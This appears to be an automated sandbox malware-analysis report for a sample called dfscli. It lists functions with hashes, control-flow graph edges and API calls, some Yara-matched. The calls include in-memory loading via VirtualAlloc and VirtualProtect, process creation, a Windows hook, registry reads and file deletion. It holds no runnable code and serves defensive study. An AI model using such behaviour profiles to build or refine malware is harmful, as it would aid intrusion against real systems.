                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
                                                                  • String ID: NotifyWinEvent$`#vp,$v$user32.dll
                                                                  • API String ID: 4004864024-19817718
                                                                  • Opcode ID: 458393a66d8bd0e2f0924bc2239fc2bb7060a4c2f2eaa8a22abf50ff16afb230
                                                                  • Instruction ID: 1aae1a9dc3cd045b93222ce5a26779434126d71d87e6cd8d5dbcd172a642732a
                                                                  • Opcode Fuzzy Hash: 458393a66d8bd0e2f0924bc2239fc2bb7060a4c2f2eaa8a22abf50ff16afb230
                                                                  • Instruction Fuzzy Hash: 9701A2717002219FD724EF21A809A593BA8AF04300F4984AFF445D73A2DB38C880CF7A
                                                                  Function 004254C2 Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 004254CF
                                                                  • GetSystemMetrics.USER32(0000000C), ref: 004254D6
                                                                  • GetSystemMetrics.USER32(00000002), ref: 004254DD
                                                                  • GetSystemMetrics.USER32(00000003), ref: 004254E7
                                                                  • GetDC.USER32(00000000), ref: 004254F1
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00425502
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042550A
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00425512
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                  • String ID:
                                                                  • API String ID: 1031845853-0
                                                                  • Opcode ID: b06320392e429a04cf71825453b5b9399e0fdba567c3017782f8956d99a1d2f7
                                                                  • Instruction ID: 6a1c861a32fe4ac7800512cecdb92344e909a3b8a9975da52ba67c4561c5568e
                                                                  • Opcode Fuzzy Hash: b06320392e429a04cf71825453b5b9399e0fdba567c3017782f8956d99a1d2f7
                                                                  • Instruction Fuzzy Hash: A6F01D71A40704AEE720AF729C89F277BA4EB81B51F11493AF6418B2D0D6B598068F54
                                                                  Function 022330D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 150memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 507 22330d0-22330e6 508 22330ea-22330ef 507->508 509 22330f0-22330f5 508->509 510 22330fb 509->510 511 22331ac-22331b1 509->511 514 2233101-2233106 510->514 515 2233198-223319c 510->515 512 22331b3-22331b8 511->512 513 2233226-22332b0 511->513 516 22331ba-22331bf 512->516 517 22331ec-22331f4 512->517 513->509 518 22332b5-22332bd 514->518 519 223310c-2233111 514->519 520 2233303-223330d 515->520 521 22331a2-22331a7 515->521 524 22331c1-22331cf 516->524 525 22331d4-22331d9 516->525 526 22331f6-223320e call 2233f20 call 2233e80 517->526 527 2233214-2233221 517->527 522 22332bf-22332d7 call 2233f20 call 2233e80 518->522 523 22332dd-2233300 518->523 528 2233113-2233118 519->528 529 223312e-2233135 519->529 521->509 522->523 523->520 524->509 525->509 531 22331df-22331e9 525->531 526->527 527->508 528->525 533 223311e-223312c call 2233d10 528->533 534 2233152-223315d 529->534 535 2233137-223314d call 2233f20 call 2233e80 529->535 533->508 549 223317a-2233188 RtlAllocateHeap 534->549 550 223315f-2233175 call 2233f20 call 2233e80 534->550 535->534 549->520 554 223318e-2233193 549->554 550->549 554->508
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 02233182
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID: &$B$S=
                                                                  • API String ID: 1279760036-3580750612
                                                                  • Opcode ID: 4b521b2d453ed485b4964c7d019078c9f0a1195a4c8206564795ce192a574a16
                                                                  • Instruction ID: 5fff627adcab5e9511c5d1e4d88bb91a0091beae034f6ef72a7779811a535692
                                                                  • Opcode Fuzzy Hash: 4b521b2d453ed485b4964c7d019078c9f0a1195a4c8206564795ce192a574a16
                                                                  • Instruction Fuzzy Hash: C451C7B1A243029BC719DEA8949852BB7E6FFD4744F104C5EF086CB258DB70DB498BD2
                                                                  Function 02234BA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 87processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 02234C21
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID: D$.#v$Ei
                                                                  • API String ID: 963392458-2687700827
                                                                  • Opcode ID: 536524d73150d234903e90576eaa7d9ed7a31ee2524f383329b7311f45224f6f
                                                                  • Instruction ID: db920037a7285f548e874873df86f1e5edc840882bf3a41fddc10e1a7f6bba8a
                                                                  • Opcode Fuzzy Hash: 536524d73150d234903e90576eaa7d9ed7a31ee2524f383329b7311f45224f6f
                                                                  • Instruction Fuzzy Hash: 6821B1B5B203026BE716EBF8AC54B6A37E2AFC0640F404C69F545CB284EFB4D9158BD1
                                                                  Function 004281D2 Relevance: 6.1, APIs: 4, Instructions: 71registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 590 4281d2-428200 591 428206 590->591 592 42828e-42829b RegCloseKey 590->592 593 428207-42821d RegOpenKeyExA 591->593 594 428276-428287 RegCloseKey 593->594 595 42821f-428222 593->595 594->593 596 42828d 594->596 597 428270-428274 595->597 596->592 597->594 598 428224-42823d RegQueryValueExA 597->598 599 428260-42826d 598->599 600 42823f-428243 598->600 599->597 600->599 601 428245-42824e 600->601 602 428250-428256 601->602 603 428258-42825a 601->603 602->599 603->599
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNELBASE(80000001,0043B2A4,00000000,00000001,?), ref: 00428215
                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 00428235
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00428279
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0042828F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Close$OpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 1607946009-0
                                                                  • Opcode ID: 65fa2c3f979de50099cc2811b2363345d5be31521dc93f030b08f37819c87299
                                                                  • Instruction ID: fa71898e03329bcf94aa1d3a20f1a241a73731d4e52d53b435c0548dfa0eec47
                                                                  • Opcode Fuzzy Hash: 65fa2c3f979de50099cc2811b2363345d5be31521dc93f030b08f37819c87299
                                                                  • Instruction Fuzzy Hash: 9E216AB1E01228EFDF15CF96D848AAEBBF8FF94314F5040AEE405A6211DB745A01CF29
                                                                  Function 0219002D Relevance: 4.9, APIs: 3, Instructions: 387memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 659 219002d-219009e call 2190456 * 6 672 21900a0-21900a2 659->672 673 21900a7-21900b0 659->673 674 219044e-2190455 672->674 673->672 675 21900b2-21900b6 673->675 675->672 676 21900b8-21900c2 675->676 677 21900e4-2190105 GetNativeSystemInfo 676->677 678 21900c4-21900c7 676->678 677->672 680 2190107-219012d VirtualAlloc 677->680 679 21900c9-21900cf 678->679 681 21900d1-21900d4 679->681 682 21900d6 679->682 683 219012f-2190133 680->683 684 2190162-219016c 680->684 687 21900d9-21900e2 681->687 682->687 688 2190135-2190138 683->688 685 219016e-2190173 684->685 686 21901a4-21901b5 684->686 689 2190177-219018a 685->689 690 2190234-2190240 686->690 691 21901b7-21901d1 686->691 687->677 687->679 692 219013a-2190142 688->692 693 2190153-2190155 688->693 695 2190199-219019e 689->695 696 219018c-2190193 689->696 697 21902f0-21902fa 690->697 698 2190246-219025d 690->698 712 21901d3 691->712 713 2190222-219022e 691->713 692->693 699 2190144-2190147 692->699 694 2190157-219015c 693->694 694->688 700 219015e 694->700 695->689 704 21901a0 695->704 696->696 701 2190195 696->701 702 2190300-2190307 697->702 703 21903b2-21903c7 call 21c27b0 697->703 698->697 705 2190263-2190273 698->705 707 2190149-219014c 699->707 708 219014e-2190151 699->708 700->684 701->695 709 2190309-2190312 702->709 731 21903c9-21903ce 703->731 704->686 710 21902d5-21902e6 705->710 711 2190275-2190279 705->711 707->693 707->708 708->694 718 2190318-2190333 709->718 719 21903a7-21903ac 709->719 710->705 716 21902ec 710->716 720 219027a-2190289 711->720 714 21901d7-21901db 712->714 713->691 717 2190230 713->717 721 21901fb-2190204 714->721 722 21901dd 714->722 716->697 717->690 723 219034d-219034f 718->723 724 2190335-2190337 718->724 719->703 719->709 725 219028b-219028f 720->725 726 2190291-219029a 720->726 739 2190207-219021c 721->739 722->721 730 21901df-21901f9 722->730 728 2190368-219036a 723->728 729 2190351-2190353 723->729 732 2190339-219033e 724->732 733 2190340-2190343 724->733 725->726 734 219029c-21902a1 725->734 727 21902c3-21902c7 726->727 727->720 742 21902c9-21902d1 727->742 743 219036c 728->743 744 2190371-2190376 728->744 737 2190359-219035b 729->737 738 2190355-2190357 729->738 730->739 740 219044c 731->740 741 21903d0-21903d4 731->741 745 2190345-219034b 732->745 733->745 735 21902a3-21902b2 734->735 736 21902b4-21902b7 734->736 735->727 736->727 747 21902b9-21902bf 736->747 737->728 749 219035d-219035f 737->749 748 219036e-219036f 738->748 739->714 751 219021e 739->751 740->674 741->740 750 21903d6-21903e0 741->750 742->710 743->748 746 2190379-2190380 744->746 745->746 754 2190388-219039d VirtualProtect 746->754 755 2190382 746->755 747->727 748->746 749->746 752 2190361-2190366 749->752 750->740 753 21903e2-21903e6 750->753 751->713 752->746 753->740 756 21903e8-21903f9 753->756 754->672 757 21903a3 754->757 755->754 756->740 758 21903fb-2190400 756->758 757->719 759 2190402-219040f 758->759 759->759 760 2190411-2190415 759->760 761 219042d-2190433 760->761 762 2190417-2190429 760->762 761->740 764 2190435-219044b 761->764 762->758 763 219042b 762->763 763->740 764->740
                                                                  APIs
                                                                  • GetNativeSystemInfo.KERNELBASE(?,?,?,?,02190005), ref: 021900E9
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,02190005), ref: 02190111
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117416875.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2190000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocInfoNativeSystemVirtual
                                                                  • String ID:
                                                                  • API String ID: 2032221330-0
                                                                  • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                  • Instruction ID: 9b64a07251f5f2f26724ec7cbc941aeac0d7e949ac953b3b7d3ff38de1105709
                                                                  • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                  • Instruction Fuzzy Hash: D7D1DF71A883068FDF24CF69C88076AB7E1FF88318F18852DE895DB241E774E955CB91
                                                                  Function 022336B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID: Ei
                                                                  • API String ID: 4033686569-3988083245
                                                                  • Opcode ID: 1a4eab572f3a903765ff23fe26fc2c1c4aad65efcaaf226eb19d3f89378d6d87
                                                                  • Instruction ID: e363d03a30651d21ca349afa6a17c5988db6a07cb8dc1d62208121304cbc8ded
                                                                  • Opcode Fuzzy Hash: 1a4eab572f3a903765ff23fe26fc2c1c4aad65efcaaf226eb19d3f89378d6d87
                                                                  • Instruction Fuzzy Hash: CD11BFB5F203016BD715F7F4A894A6B36E7AFC0644B04086CE456CB248EE78CA118BE1
                                                                  Function 0040DDBD Relevance: 3.0, APIs: 2, Instructions: 34memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 0040DDDF
                                                                    • Part of subcall function 004108E8: EnterCriticalSection.KERNEL32(?,?,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00410910
                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00431A20,0000000C,0040DE48,000000E0,0040DE73,?,0041086B,00000018,00431B30,00000008,00410901,?,?), ref: 0040DE20
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateCriticalEnterHeapSection__lock
                                                                  • String ID:
                                                                  • API String ID: 409319249-0
                                                                  • Opcode ID: 0be4bc3f3b2008a58ca10510bab6c21abc707aaf6d34d0de6824ed3c22b2e4db
                                                                  • Instruction ID: cb3ef9c9b0d75a7fffe9d60d5eea93ecefce8f5efa7861fcc474e081dc08dee6
                                                                  • Opcode Fuzzy Hash: 0be4bc3f3b2008a58ca10510bab6c21abc707aaf6d34d0de6824ed3c22b2e4db
                                                                  • Instruction Fuzzy Hash: 30F0C231D41A14A7DB20BFA1EC0675E7B30AB25728F20023BE9143A2E1C73C299986CC
                                                                  Function 00410933 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040E8E0,00000001,?,00431A70,00000060), ref: 00410944
                                                                    • Part of subcall function 00410984: HeapAlloc.KERNEL32(00000000,00000140,0041096C,000003F8,?,00431A70,00000060), ref: 00410991
                                                                  • HeapDestroy.KERNEL32(?,00431A70,00000060), ref: 00410977
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocCreateDestroy
                                                                  • String ID:
                                                                  • API String ID: 2236781399-0
                                                                  • Opcode ID: 0c262e1b3af968b4c6dfc27b1994cb5ebb7051e99d81131d6ad7a3e46444b815
                                                                  • Instruction ID: 644ccde18484a5878455bc069f2a0ce95f43452f64f7cc8ffed50bff23627854
                                                                  • Opcode Fuzzy Hash: 0c262e1b3af968b4c6dfc27b1994cb5ebb7051e99d81131d6ad7a3e46444b815
                                                                  • Instruction Fuzzy Hash: E7E09AF1BB03089AFB206B716C1876676A4EB44346F10483BF240C82A2EFB8D5C19A0C
                                                                  Function 0041F835 Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0041F848
                                                                  • SetWindowsHookExA.USER32(000000FF,0041F6B7,00000000,00000000), ref: 0041F858
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentHookThreadWindows
                                                                  • String ID:
                                                                  • API String ID: 1904029216-0
                                                                  • Opcode ID: 701a3d6a2974d6ff03211ac8c2448b0ce0685527336f7c5a3be3efa98d3f99a2
                                                                  • Instruction ID: 92535d9c526e6fa1784d7b0884afd0ec4ee71ce80cfdde11631e7970a4356ca2
                                                                  • Opcode Fuzzy Hash: 701a3d6a2974d6ff03211ac8c2448b0ce0685527336f7c5a3be3efa98d3f99a2
                                                                  • Instruction Fuzzy Hash: 32D05E72B042606EDB217B72BC09B553A845B00320F9806AAF411911D2C7288C834B6E
                                                                  Function 02235CA0 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000), ref: 02235CCB
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: c18f626bd62c2e601dedae607d7f27ce85d5ff8326e1735b070e030a7c522120
                                                                  • Instruction ID: a7008425a57ec5e33412e394bdf2e75d99925af604c04b986ca7cbd526e88a97
                                                                  • Opcode Fuzzy Hash: c18f626bd62c2e601dedae607d7f27ce85d5ff8326e1735b070e030a7c522120
                                                                  • Instruction Fuzzy Hash: F1D0C9A6B61301A6E601AAF0785472A25AB5FA0645F404819F549DA29CEE7489214AD1
                                                                  Function 0041CDD7 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: e2d040b58d2e732b0d0dcea39a807528dcdbe6e0a658436ef4808abc9a245d1d
                                                                  • Instruction ID: 86b6000765a73317fef6ebdd1d3f7835681af8542c8e3a940374cd9bb61a5516
                                                                  • Opcode Fuzzy Hash: e2d040b58d2e732b0d0dcea39a807528dcdbe6e0a658436ef4808abc9a245d1d
                                                                  • Instruction Fuzzy Hash: 145173319402049FCB14DBA9CCC09EEB7F9EF49324F24452BE512E76D0D778A985CBA9
                                                                  Function 021C1D10 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117474523.00000000021C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021C1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_21c1000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 22393a0a231f58714c2abf88766f729b7b744dc00a807db8671df6b4b1cf26ba
                                                                  • Instruction ID: 49daa0df4f8a965b6ccf561f30a6983fd8226c824fa50cf98b9a78ade69b819d
                                                                  • Opcode Fuzzy Hash: 22393a0a231f58714c2abf88766f729b7b744dc00a807db8671df6b4b1cf26ba
                                                                  • Instruction Fuzzy Hash: DB41CA78A84109EFDB04CF44C494BAAB7B2FB98314F24C599E8199F355C775EA92CB80
                                                                  Function 02236FB0 Relevance: 1.6, APIs: 1, Instructions: 107libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,022368DC), ref: 022370F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: c604fecd2f357d0cd35e3c68154e47d7c3af0cb7dab060c071d8e2c53ccdbbba
                                                                  • Instruction ID: 9b2ced41c999442ca5a45b78ee36d5abc03ac4ebb41b76e00b316bc642c36f38
                                                                  • Opcode Fuzzy Hash: c604fecd2f357d0cd35e3c68154e47d7c3af0cb7dab060c071d8e2c53ccdbbba
                                                                  • Instruction Fuzzy Hash: DD31A1E5B3420267DE27AAF9649433B515F9B84244F64086AF043CF35CDEB9CD128BD6
                                                                  Function 02236F10 Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,0223704F,022368DC), ref: 02236F40
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
